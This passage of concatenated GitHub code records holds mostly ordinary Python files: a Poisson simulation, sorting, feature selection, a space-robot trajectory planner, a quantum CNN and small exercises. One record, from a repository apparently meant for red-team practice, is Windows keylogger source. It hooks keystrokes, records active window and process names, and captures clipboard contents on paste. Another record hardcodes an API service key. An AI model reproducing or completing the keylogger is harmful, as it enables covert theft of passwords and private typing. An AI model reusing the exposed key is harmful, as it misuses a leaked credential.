self.engine_auth.effect_project,\n ]\n return await Engine.multi_effect_project(projections, previous_state, 
event)\n\n","repo_name":"kshaa/dip-testbed","sub_path":"client/src/engine/monitor/minos/engine_monitor_minos.py","file_name":"engine_monitor_minos.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"4790416470","text":"#!/usr/bin/env python3\n\n\nimport io\nimport ctypes\nimport os\nimport pythoncom\nimport pyHook\nimport pywin32_system32\nimport sys\nimport time\nimport win32clipboard\n\n\"\"\"Set a timer \n in seconds by\n defining a constant\n name TIMEOUT,\n with the value \n initialized as\n 60*10\"\"\"\nTIMEOUT = 60 * 10\n\n\nclass KeyLogger:\n \"\"\"Define and initialize\n a KeyLogger class\n with one variable,\n current_window, with\n the default value set to\n None.\n \"\"\"\n\n def __init__(self):\n self.current_window = None\n\n def get_current_process(self):\n \"\"\"Capture the active window\n and its associated process ID,\n GetForeGroundWindow returns\n a handle to the active window\n on the targets desktop,\n pass the handle to GetWindowThreadProcessId\n to retrieve PID.\n Open process, get PID, get\n .exe name of process,\n Grab full text using GetWindowTextA,\n \"\"\"\n hwnd = windll.user32.GetForeGroundWindow()\n pid = c_ulong(0)\n windll.user32.GetWindowThreadProcessId(hwnd, byref(pid))\n process_id = f'{pid.value}'\n\n executable = create_string_buffer(512)\n h_process = windll.kernel32.OpenProcess(0x400|0x10, False, pid)\n windll.psapi.GetModuleBaseNameA(h_process, None, byref(executable, 512))\n window_title = create_string_buffer(512)\n windll.user32.GetWindowTextA(hwnd, byref(window_title), 512)\n try:\n self.current_window = window_title.value.decode()\n except UnicodeDecodeError as e:\n print(f'{e}: window name unknown')\n\n print('\\n', process_id, executable.value.decode(), self.current_window)\n\n windll.kernel32.CloseHandle(hwnd)\n windll.kernel32.CloseHandle(h_process)\n\n def mykeystroke(self, event):\n \"\"\"Bind the key-down event\n to the KeyLogger method mykeystroke\"\"\"\n if event.Windowname != self.current_window:\n self.get_current_process()\n if 32 < event.Ascii < 127:\n print(chr(event.Ascii), end='')\n else:\n if event.Key == 'V':\n win32clipboard.OpenClipboard(())\n value = win32clipboard.GetClipboardData()\n win32clipboard.CloseClipboard()\n print(f'[PASTE] - {value}')\n else:\n print(f'{event.Key}')\n return True\n\n def run():\n save_stdout = sys.stdout\n sys.stdout = StringIO()\n\n kl = KeyLogger()\n hm = pyHook.HookManager\n hm.HookKeyboard()\n while time.thread_time() < TIMEOUT:\n pythoncom.PumpWaitingMessages()\n log = sys.stdout.getvalue()\n sys.stdout = save_stdout\n return log\n if __name__ == '__main__':\n print(run())\n print('done.')\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Grant-Knoetze/Python-red-team-code","sub_path":"KeyLogger.py","file_name":"KeyLogger.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"12540978917","text":"# -*- coding: utf-8 -*-\n\nimport random\nimport math\nfrom distribuciones import intervalo, poisson\n\n\ndef procesoPoissonHomogeneo(lamda, tiempo):\n \"\"\"\n Genera la cantidad de afionados que llegan al encuentro durante un\n las primeras T (tiempo) unidades de tiempo, con parametro lamda.\n \"\"\"\n t = 0 # tiempo transcurrido\n i = 0 # N° colectivos\n s = [] # S[i]: tiempo del evento mas reciente\n\n aficionados = 0 # Cantidad total de aficionados\n j = 0\n\n while True:\n u = random.random()\n\n if t 
- (math.log(u)/float(lamda)) > tiempo:\n break\n else:\n t -= (math.log(u)/float(lamda))\n i += 1\n s.append(t)\n\n # Asigno a cada colectivo una capacidad {20...40}\n while j < i:\n aficionados += intervalo(20, 21) # Numero entre 20 y 40 -> aficionados\n j += 1\n\n return aficionados\n\n\ndef esperanza(n):\n \"\"\"\n Esperanza del Proceso de Poisson Homogeneo.\n \"\"\"\n a = 0\n for _ in xrange(n):\n a += procesoPoissonHomogeneo(5, 10)\n\n return a/float(n)\n\n\n\nfor n in [100, 1000, 10000, 100000]:\n print(\"n =\", n, \"--> E(aficionados) =\", esperanza(n))\n","repo_name":"famaf/Modelos_Simulacion_2016","sub_path":"Practico_05/ejercicio11.py","file_name":"ejercicio11.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"30338349838","text":"# Challenges 034\r\n\r\n\"\"\"\r\nDisplay the following message:\r\n 1) Square\r\n 2) Triangle\r\n\r\n Enter a number:\r\n\r\nIf the user enters 1, \r\nthen it should ask them for the length of one of the sides, \r\nand display the area.\r\nIf they select 2, it should ask for the base\r\nand height of the triangle and display the area.\r\nIf they type anything else, it should give them a error message.\r\n\"\"\"\r\n\r\n\r\nprint(\"1) Square\")\r\nprint(\"2) Triangle\")\r\nnum = int(input(\"Enter a number: \"))\r\n\r\n\r\nif num == 1:\r\n side_length = int(input(\"Enter the length of one of the sides: \"))\r\n area = side_length * side_length\r\n print(f\"The area of your shape is: {area}\")\r\nelif num == 2:\r\n base = int(input(\"Enter the length of the base: \"))\r\n height = int(input(\"Enter the height of the triangle: \"))\r\n area = (base * height) / 2\r\n print(f\"The area of your shape is: {area}\")\r\nelse:\r\n print(\"Incorrect number, please try again.\")\r\n","repo_name":"d-bingaling/python-by-example","sub_path":"Maths/ex34.py","file_name":"ex34.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"}
+{"seq_id":"13956435492","text":"import requests\nimport datetime\nimport json\n\nurl = 'http://apis.data.go.kr/B552584/UlfptcaAlarmInqireSvc/getUlfptcaAlarmInfo'\nparams ={'serviceKey' : 'clCEJad0tTqdiSPIpwIKf1s/mOlQyCBXSVK6yt2OxzqUmgboB4KjsR2NnNuCo2vsS3LmoZQQKZD9bMP48ZZ8gg==', 'returnType' : 'json', 'numOfRows' : '100', 'pageNo' : '1', 'year' : '2020', 'itemCode' : 'PM10' }\n\nresponse = requests.get(url, params=params)\nprint(response)\nprint(response.content)\nitems = response.json().get('response').get('body').get('items')\n#활용\n\ntoday = datetime.datetime.today()\nareaName = input(\"검색 지역 입력 : \")\n\ndata = dict()\ndata['districtName'] = areaName\n\narea_data = dict()\nfor item in items['item']:\n\n # 상태\n area_code = item['issueGbn']\n\n if area_code == '주의보':\n area_state = '주의보'\n elif area_code == '경보':\n area_state = '경보'\n\n else:\n area_state = '없음'\n\n area_data['code'] = area_code\n area_data['state'] = area_state\n\ndata['districtName'] = area_data\nprint(data['districtName'])","repo_name":"Ju0011/KAIST_AIcolleage","sub_path":"6_11/OpenAPI_2.py","file_name":"OpenAPI_2.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"5838927361","text":"\nimport sys\nimport heapq as hq\ninput = sys.stdin.readline\n\nn,h,t = map(int,input().split())\narr = []\ncnt = 0\nfor _ in range(n): # 최대힙으로 만들기 위해 음수로 append \n arr.append(-int(input()))\n\nhq.heapify(arr)\n\nwhile arr and cnt != t:\n if -arr[0] >= h: # 거인들의 키가 더 크거나 
같을 때\n if -arr[0] == 1: # 최대힙인데 1이 나오면 while문 바로 종료\n break\n else: # 거인의 키를 1/2로 줄여나가고, cnt를 1씩 증가 \n hq.heappush(arr,int((hq.heappop(arr)/2)))\n cnt += 1\n else:\n break\n\nif all(h > -x for x in arr): # while문이 끝났을 때 arr안의 모든 원소가 h보다 작으면 yes\n print('YES')\n print(cnt)\n \nelse: # 아니면 NO \n print('NO')\n print(-arr[0])\n\n\n \n\n\n\n","repo_name":"busangangster/Algorithm","sub_path":"baekjoon/Python/우선순위 큐/19638.py","file_name":"19638.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"16643952577","text":"import plotly.figure_factory as pff\nfrom sklearn.datasets import load_boston\nimport pandas as pd\nimport numpy as np\n\n# Loading the dataset\nboston = load_boston()\nX = pd.DataFrame(boston.data, columns=boston.feature_names) # Feature Matrix\nY = pd.DataFrame(boston.target, columns=[\"MEDV\"]) # Target Variable\n\n\n# Filtering: Pearson correlation: https://en.wikipedia.org/wiki/Pearson_correlation_coefficient\n\nData = pd.concat([X, Y], axis=1)\nCoRel = Data.corr()\n\n# Plotting the heat map of Pearson Correlation for all features in relation to each other\n# fig_1 = pff.create_annotated_heatmap(np.array(CoRel).round(decimals=2), colorscale='RdBu', x=list(Data.columns.values), y=list(Data.columns.values))\n# fig_1.show()\n\n# We are looking for correlation above 0.5 or below -0.5\nCoRel_Abs = abs(CoRel[\"MEDV\"])\nSelFeat = CoRel_Abs[CoRel_Abs > 0.5]\n\n# We need to make sure that Selected Features are independant of each other\nSelCoRel = Data[SelFeat.index.values].corr()\n\n# Plotting the heat map of Selected Features Correlation\n# fig_2 = pff.create_annotated_heatmap(np.array(SelCoRel).round(decimals=2), colorscale='RdBu', x=list(SelCoRel.columns.values), y=list(SelCoRel.columns.values))\n# fig_2.show()\n\n# Checking for correlation of Selected feature beaing above 0.5 or below -0.5\nmask = np.array(0.5 < abs(SelCoRel.iloc[:-1, :-1])) # droping target (MEDV)\n# droping the diagonal elements (since they are meaningless) and upper triangle (since it is repetative)\nmask *= np.tri(mask.shape[0], mask.shape[0], -1, dtype=\"bool\")\n# finding the location of coorelated selected features\nSelCoRelInd = np.argwhere(mask)\n\n# checking the correlation of them (correlated selected features) with target\nTargetSelCoRel = np.array(abs(SelCoRel.iloc[-1]))\n\n# find the index of minimum correlation in each row\nMinInd = np.argmin(TargetSelCoRel[SelCoRelInd], axis=1)\n# find the index of non independant features\nNonIndFeat = SelCoRelInd[np.arange(MinInd.size), MinInd]\n\n# set dependand features to NaN and drop them\nSelFeat.iloc[NonIndFeat] = None\nSelFeat = SelFeat.dropna()\nprint(SelFeat)\n","repo_name":"shervinazadi/Notebook_MachineLearning","sub_path":"SETUPS/PY_Regression_Feature_Selection/Reg_FeatSel_Filter_Pearson.py","file_name":"Reg_FeatSel_Filter_Pearson.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"11872304196","text":"\"\"\"\nImplementation of Merge Sort.\n\"\"\"\n\n# Author: Nikhil Xavier \n# License: BSD 3 clause\n\n\ndef merge_sort(arr):\n \"\"\"Function to perform Merge sort in ascending order.\n\n TIME COMPLEXITY: Best:O(n ln(n)), Average:O(n ln(n)), Worst:O(n ln(n))\n SPACE COMPLEXITY: Worst: O(n)\n \"\"\"\n\n if len(arr) > 1:\n mid = len(arr)//2\n left_arr = arr[:mid]\n right_arr = arr[mid:]\n merge_sort(left_arr)\n merge_sort(right_arr)\n i, j, k = 0, 0, 0\n\n while i < len(left_arr) and j < len(right_arr):\n if left_arr[i] < right_arr[j]:\n arr[k] = left_arr[i]\n i = i + 1\n else:\n arr[k] = right_arr[j]\n j = j + 1\n k = k + 1\n\n while i < len(left_arr):\n arr[k] = left_arr[i]\n i = i + 1\n k = k + 1\n\n while j < len(right_arr):\n arr[k] = right_arr[j]\n j = j + 1\n k = k + 1\n","repo_name":"Nikhil-Xavier-DS/Sort-Search-Algorithms","sub_path":"merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"5267369609","text":"import os\nimport shutil\nimport urllib.request\nimport zipfile\n\n\ndef dl_dir_from_zip(url, output_path):\n \"\"\" download a zip from url and place contents in output_path \"\"\"\n # if the directory does not exist, assume it needs downloading\n if not os.path.isdir(output_path):\n print('downloading', url)\n urllib.request.urlretrieve(url, 'temp.zip')\n with zipfile.ZipFile(\"temp.zip\", \"r\") as zip_ref:\n zip_ref.extractall('temp_zip_output')\n\n # remove the junk osx metadata that was in the zip file\n junk_osx_dir = os.path.join('temp_zip_output', '__MACOSX')\n\n if os.path.isdir(junk_osx_dir):\n shutil.rmtree(junk_osx_dir)\n\n os.remove(os.path.join(os.getcwd(), 'temp.zip'))\n \n zip_dir = os.listdir(os.path.join('temp_zip_output'))[0]\n zip_path = os.path.join('temp_zip_output', zip_dir)\n shutil.move(zip_path, output_path)\n shutil.rmtree('temp_zip_output')\n\n\n","repo_name":"Abe404/RootPainter3D","sub_path":"trainer/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"96"}
+{"seq_id":"12431240367","text":"# -*- coding: utf-8 -*-\n# Upside Travel, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport errno\nimport datetime\nimport os\nimport os.path\n\nAV_DEFINITION_S3_BUCKET = os.getenv(\"AV_DEFINITION_S3_BUCKET\")\nAV_DEFINITION_S3_PREFIX = os.getenv(\"AV_DEFINITION_S3_PREFIX\", \"clamav_defs\")\nAV_DEFINITION_PATH = os.getenv(\"AV_DEFINITION_PATH\", \"/tmp/clamav_defs\")\nAV_SCAN_START_SNS_ARN = os.getenv(\"AV_SCAN_START_SNS_ARN\")\nAV_SCAN_START_METADATA = os.getenv(\"AV_SCAN_START_METADATA\", \"av-scan-start\")\nAV_SIGNATURE_METADATA = os.getenv(\"AV_SIGNATURE_METADATA\", \"av-signature\")\nAV_SIGNATURE_OK = \"OK\"\nAV_SIGNATURE_UNKNOWN = \"UNKNOWN\"\nAV_STATUS_CLEAN = os.getenv(\"AV_STATUS_CLEAN\", \"CLEAN\")\nAV_STATUS_INFECTED = os.getenv(\"AV_STATUS_INFECTED\", \"INFECTED\")\nAV_STATUS_METADATA = os.getenv(\"AV_STATUS_METADATA\", \"av-status\")\nAV_STATUS_SNS_ARN = os.getenv(\"AV_STATUS_SNS_ARN\")\nAV_STATUS_SNS_PUBLISH_CLEAN = os.getenv(\"AV_STATUS_SNS_PUBLISH_CLEAN\", \"True\")\nAV_STATUS_SNS_PUBLISH_INFECTED = os.getenv(\"AV_STATUS_SNS_PUBLISH_INFECTED\", \"True\")\nAV_TIMESTAMP_METADATA = os.getenv(\"AV_TIMESTAMP_METADATA\", \"av-timestamp\")\nCLAMAVLIB_PATH = os.getenv(\"CLAMAVLIB_PATH\", \"./bin\")\nCLAMSCAN_PATH = 
os.getenv(\"CLAMSCAN_PATH\", \"./bin/clamscan\")\nFRESHCLAM_PATH = os.getenv(\"FRESHCLAM_PATH\", \"./bin/freshclam\")\nAV_PROCESS_ORIGINAL_VERSION_ONLY = os.getenv(\n \"AV_PROCESS_ORIGINAL_VERSION_ONLY\", \"False\"\n)\nAV_DELETE_INFECTED_FILES = os.getenv(\"AV_DELETE_INFECTED_FILES\", \"False\")\n\nAV_DEFINITION_FILE_PREFIXES = [\"main\", \"daily\", \"bytecode\"]\nAV_DEFINITION_FILE_SUFFIXES = [\"cld\", \"cvd\"]\nSNS_ENDPOINT = os.getenv(\"SNS_ENDPOINT\", None)\nS3_ENDPOINT = os.getenv(\"S3_ENDPOINT\", None)\nLAMBDA_ENDPOINT = os.getenv(\"LAMBDA_ENDPOINT\", None)\n\n\ndef create_dir(path):\n if not os.path.exists(path):\n try:\n print(\"Attempting to create directory %s.\\n\" % path)\n os.makedirs(path)\n except OSError as exc:\n if exc.errno != errno.EEXIST:\n raise\n\n\ndef get_timestamp():\n return datetime.datetime.utcnow().strftime(\"%Y/%m/%d %H:%M:%S UTC\")\n","repo_name":"bluesentry/bucket-antivirus-function","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":526,"dataset":"github-code","pt":"96"} +{"seq_id":"22460929630","text":"import urllib.request\nimport urllib.parse\n\nurl=\"https://www.httpbin.org/post\"\nheaders={\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36\",\n \"host\":\"www.httpbin.org\",\n }\ndict={\n \"name\":\"Germey\"\n}\n\ndata=bytes(urllib.parse.urlencode(dict),encoding=\"utf8\")\nreq=urllib.request.Request(url=url,data=data,headers=headers,method=\"POST\")\nresponse=urllib.request.urlopen(req)\nprint(response.read().decode(\"utf8\"))\n","repo_name":"HandsomeLunHui/CrawlAndOj","sub_path":"crawl/urllib_crawl.py","file_name":"urllib_crawl.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"9944642121","text":"# ////////////////////////////////////////\n# // //\n# // Name: Tristan Simpson //\n# // //\n# // Assignment: Little Proffessor //\n# // //\n# ////////////////////////////////////////\nimport sys, random\n\n# // Get the level the user wants to be play\ndef get_level() -> int:\n choice: int = 0\n\n # // While choice is invalid (not 1, 2 or 3)\n while choice <= 0 or choice > 3:\n try:\n choice = int(input(\"Level: \"))\n except Exception: pass\n return choice\n\n# // Generate a random integer depending\n# // on the level choice\ndef generate_integer(level: int) -> int:\n return {\n 1: random.randint(0, 9),\n 2: random.randint(10, 99),\n 3: random.randrange(100, 999)\n }[level]\n\n# // Main function\ndef main():\n # // Get the level the user wants to play at\n level: int = get_level()\n\n # // Pre-Defined Variables\n errors: int = 0\n score: int = 0\n answer: int = -1\n\n # // Play game 10 times\n for _ in range(10):\n x: int = generate_integer(level)\n y: int = generate_integer(level)\n\n solution: int = x + y\n while solution != answer:\n # // Exit the program after printing the\n # // correct answer\n if errors >= 3:\n print(solution)\n sys.exit(f\"Score: {score}\")\n\n try:\n answer: int = int(input(f\"{x} + {y} = \"))\n except Exception:\n pass\n\n # // If the answer is correct, increase score\n if solution == answer:\n errors = 0\n score += 1\n\n # // Else, increase errors\n elif solution != answer:\n errors += 1\n print(\"EEE\")\n\n # // Print the users score\n print(f\"Score: {score}\")\n\n\n# // Run the program\nif __name__ == \"__main__\":\n main()\n\n# check50 
cs50/problems/2022/python/professor\n# submit50 cs50/problems/2022/python/professor","repo_name":"realTristan/CS50P","sub_path":"ProblemSet_4/Little_Professor.py","file_name":"Little_Professor.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"96"} +{"seq_id":"18890605607","text":"#Accept Number & Check Whether the Number is Divisible by 5 or NOT\r\n\r\ndef Divisible5(No) :\r\n if((No % 5) == 0) :\r\n return True\r\n \r\n else :\r\n return False\r\n\r\ndef main() :\r\n print(\"Enter a Number\")\r\n Value = int(input())\r\n\r\n Ret = False\r\n Ret = Divisible5(Value)\r\n\r\n if(Ret == True):\r\n print(\"Number is Divisible by 5\")\r\n\r\n else:\r\n print(\"Number is NOT Divisible by 5\")\r\n\r\nif __name__ == \"__main__\" :\r\n main()","repo_name":"YashrajTilekar/Python","sub_path":"Assignment1_7.py","file_name":"Assignment1_7.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"1813232071","text":"#!/usr/bin/env python3.6\n\nimport pinocchio as pin\nfrom pinocchio.robot_wrapper import RobotWrapper\nimport rospy\nimport rospkg\nimport numpy as np\nimport time\nimport threading\nfrom std_msgs.msg import Bool, Float64, ColorRGBA\nfrom nav_msgs.msg import Odometry \nfrom sensor_msgs.msg import JointState \nfrom visualization_msgs.msg import Marker, MarkerArray\nfrom geometry_msgs.msg import PointStamped, Point, PoseStamped\nfrom scipy.spatial.transform import Rotation as R\nfrom arm import dynamics, linearize_dynamics, ee_fk, ee_jacobian\nfrom dircol_problem import DircolProblem\nfrom fk_dircol_problem import FKDircolProblem\nimport crocoddyl as croc\n\nnp.set_printoptions(linewidth=np.inf)\nnp.set_printoptions(suppress=True)\n\n# Initialize node and get parameters\nrospy.init_node('dircol_node', anonymous=True)\ndt = rospy.get_param('dt')\nsteps = rospy.get_param('planning_steps')\nsim_integration = rospy.get_param('sim_integration')\nplanner_integration = rospy.get_param('planner_integration')\njoint_angle_lower_limits = rospy.get_param('joint_angle_lower_limits')\njoint_angle_upper_limits = rospy.get_param('joint_angle_upper_limits')\njoint_torque_limits = rospy.get_param('joint_torque_limits')\ngoal_pos = rospy.get_param('goal_position')\ngoal_angle = rospy.get_param('goal_angle')\ninitial_joint_angles = rospy.get_param('initial_joint_angles')\ninitial_base_position = rospy.get_param('initial_base_position')\ninitial_base_angle = rospy.get_param('initial_base_angle')\n\n# Instantiate planner with urdf file\nrospack = rospkg.RosPack()\npath = rospack.get_path('sos_space')\nurdf_file = path + '/urdf/robot.urdf'\n\n# Publishers\nodom_pub = rospy.Publisher('/space_robot/odom', Odometry, queue_size=1)\njoints_pub = rospy.Publisher('/space_robot/fbk/joint_state', JointState, queue_size=1)\ngoal_pub = rospy.Publisher('/space_robot/goal', PoseStamped, queue_size=1)\ngoal_pose = PoseStamped()\ngoal_pose.header.frame_id = 'goal'\ngoal_pose.pose.position.x = goal_pos[0]\ngoal_pose.pose.position.y = goal_pos[1]\ngoal_pose.pose.orientation.z = np.sin(goal_angle/2)\ngoal_pose.pose.orientation.w = np.cos(goal_angle/2)\n\nplan_pub = rospy.Publisher('/space_robot/plan', Marker, queue_size=1)\nplan_marker = Marker()\nplan_marker.type = Marker.LINE_STRIP\nplan_marker.action = Marker.ADD\nplan_marker.pose.position.x = 0\nplan_marker.pose.position.y = 0\nplan_marker.pose.position.z = 0\nplan_marker.pose.orientation.w = 
1\nplan_marker.pose.orientation.x = 0\nplan_marker.pose.orientation.y = 0\nplan_marker.pose.orientation.z = 0\nplan_marker.scale.x = 0.01\nplan_marker.color.r = 1\nplan_marker.color.g = 0\nplan_marker.color.b = 0\nplan_marker.color.a = 1\nplan_marker.header.frame_id = \"world\"\nplan_marker.ns = \"test_node\"\n\n'''\nfrom vm_dynamics import VMDynamics\nvmd = VMDynamics()\nvmd.euler_lagrange()\n'''\n\narm_dynamics = dynamics(urdf_file)\narm_dynamics_deriv = linearize_dynamics(urdf_file)\n\nQ = 1\nR = np.eye(arm_dynamics.num_rotary)\nnx = 2*(arm_dynamics.num_rotary + 3)\nnu = arm_dynamics.num_rotary\nxinit = np.zeros(nx)\nxinit[3:3 + arm_dynamics.num_rotary] = np.array(initial_joint_angles)\nulb = -np.array(joint_torque_limits)\nuub = np.array(joint_torque_limits)\nfk = ee_fk(urdf_file)\njacobian = ee_jacobian(urdf_file)\nproblem = FKDircolProblem(Q, R, steps, dt, arm_dynamics, arm_dynamics_deriv, nx, nu, xinit, ulb, uub, np.array(goal_pos), fk, jacobian, nx//2, nx//2)\nxs, us, solved = problem.solve()\nts = [dt*i for i, x in enumerate(xs)]\n\nrobot = RobotWrapper.BuildFromURDF(urdf_file, root_joint=pin.JointModelFreeFlyer())\nrobot.model.gravity.setZero()\nmodel = robot.model\n\ndata = pin.Data(model)\n\nfor x in xs:\n point = fk(x[:3 + arm_dynamics.num_rotary])\n plan_marker.points.append(Point(point[0], point[1], 0))\n\nt = 0\nstep = 0\nx = np.concatenate((pin.neutral(model), np.zeros(model.nv)))\nx[7:model.nq] = np.array(initial_joint_angles)\nx[:2] = np.array(initial_base_position)\nx[5] = np.sin(initial_base_angle/2)\nx[6] = np.cos(initial_base_angle/2)\n\nstate = croc.StateMultibody(robot.model)\nactuationModel = croc.ActuationModelFloatingBase(state)\naction_model = croc.IntegratedActionModelRK4(croc.DifferentialActionModelFreeFwdDynamics(state, actuationModel, croc.CostModelSum(state, len(us[0]))), dt)\naction_data = action_model.createData()\n\nrate = rospy.Rate(20)\nwhile not rospy.is_shutdown():\n u = us[step]\n tau = np.concatenate((np.zeros(6), u))\n f_ext = [pin.Force.Zero() for i in range(model.njoints)]\n '''\n q = x[:model.nq]\n v = x[model.nq:]\n acc = pin.aba(model, data, q, v, tau, f_ext)\n\n vnew = v + acc*dt\n qnew = pin.integrate(model, q, vnew*dt)\n x = np.concatenate((qnew, vnew))\n '''\n action_model.calc(action_data, x, u)\n x = np.copy(action_data.xnext)\n\n odom = Odometry()\n odom.pose.pose.position.x = x[0]\n odom.pose.pose.position.y = x[1]\n odom.pose.pose.position.z = x[2]\n odom.pose.pose.orientation.x = x[3]\n odom.pose.pose.orientation.y = x[4]\n odom.pose.pose.orientation.z = x[5]\n odom.pose.pose.orientation.w = x[6]\n odom.twist.twist.linear.x = x[model.nq]\n odom.twist.twist.linear.y = x[model.nq + 1]\n odom.twist.twist.linear.z = x[model.nq + 2]\n odom.twist.twist.angular.x = x[model.nq + 3]\n odom.twist.twist.angular.y = x[model.nq + 4]\n odom.twist.twist.angular.z = x[model.nq + 5]\n odom.header.stamp = rospy.Time.now()\n\n joints = JointState()\n for j in range(arm_dynamics.num_rotary):\n name = model.names[j + 2]\n joints.name.append(name)\n jidx = model.getJointId(name) - 2\n joints.position.append(x[7 + jidx])\n joints.velocity.append(x[model.nq + 6 + jidx])\n\n joints.header.stamp = rospy.Time.now()\n odom_pub.publish(odom)\n joints_pub.publish(joints)\n\n plan_marker.header.stamp = rospy.Time.now()\n plan_pub.publish(plan_marker)\n\n goal_pose.header.stamp = rospy.Time.now()\n goal_pub.publish(goal_pose)\n\n t += dt\n step += 1\n\n if step >= steps:\n break\n\n 
rate.sleep()\n","repo_name":"EpicDuckPotato/sos_space","sub_path":"scripts/dircol_node.py","file_name":"dircol_node.py","file_ext":"py","file_size_in_byte":5816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"25766546886","text":"from tensorflow.keras import Input, Model\nfrom tensorflow.keras.layers import Flatten, Dense\nimport numpy as np\nfrom qml_hep_lhc.layers.qconv2d import QConv2D\nfrom qml_hep_lhc.models.base_model import BaseModel\n\n\nclass QCNNCong(BaseModel):\n \"\"\"\n\tQuantum Convolutional Neural Network.\n\tThis implementation is based on https://arxiv.org/abs/2012.12177\n\t\"\"\"\n def __init__(self, data_config, args=None):\n super(QCNNCong, self).__init__(args)\n self.args = vars(args) if args is not None else {}\n\n # Data config\n self.input_dim = data_config[\"input_dims\"]\n kernel_size = (self.input_dim[0], self.input_dim[1])\n n_layers = self.args.get(\"n_layers\", 3)\n self.fm_class = \"AngleMap\"\n self.ansatz_class = \"Cong\"\n\n self.qconv2d = QConv2D(\n filters=1,\n kernel_size=kernel_size,\n strides=1,\n n_layers=n_layers,\n padding=\"valid\",\n cluster_state=False,\n fm_class=self.fm_class,\n ansatz_class=self.ansatz_class,\n drc=False,\n name='qconv2d',\n )\n\n self.flatten = Flatten()\n\n def call(self, input_tensor):\n x = self.qconv2d(input_tensor)\n x = self.flatten(x)\n return x\n\n def build_graph(self):\n x = Input(shape=self.input_dim)\n return Model(inputs=[x], outputs=self.call(x), name=\"QCNNCong\")\n\n @staticmethod\n def add_to_argparse(parser):\n parser.add_argument(\"--n-layers\", type=int, default=3)\n return parser\n","repo_name":"ML4SCI/QMLHEP","sub_path":"Quantum_CNN_for_HEP_Gopal_Ramesh_Dahale/qml_hep_lhc/models/quantum/qcnn_cong.py","file_name":"qcnn_cong.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"96"} +{"seq_id":"18639144407","text":"import tensorflow as tf\nfrom tensorflow.keras.optimizers import SGD, Adam\nfrom tensorflow.keras.layers import Embedding, Dense, LSTM,Flatten\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\n\n\n\n\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.utils import to_categorical\n\nimport numpy as np\nimport pandas as pd\nfrom pandas import DataFrame\nimport matplotlib.pyplot as plt\n\nimport itertools\n\nfrom konlpy.tag import Okt\nfrom konlpy.tag import Mecab\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sentence_transformers import SentenceTransformer\n\nfrom pykospacing import Spacing\n\n\n\n\nimport sys\n\n\nspacing = Spacing()\n\nlist1=[]\nlist2=[]\n\nf = open(\"a1.txt\", 'r')\nlines = f.readlines()\n\nfor line in lines:\n line = line.strip() # 줄 끝의 줄 바꿈 문자를 제거한다.\n list1.append(line)\n\ncharacters =\".,!?'()\"\n\n\nfor i in range(len(list1)):\n word1 = list1[i].replace(characters[0],\" \")\n word1 = word1.replace(characters[1],\" \")\n word1 = word1.replace(characters[2],\" \")\n word1 = word1.replace(characters[3],\" \")\n word1 = word1.replace(characters[4],\" \")\n word1 = word1.replace(characters[5],\" \")\n word1 = word1.replace(characters[6],\" \")\n word1 = word1.split('|')\n \n 
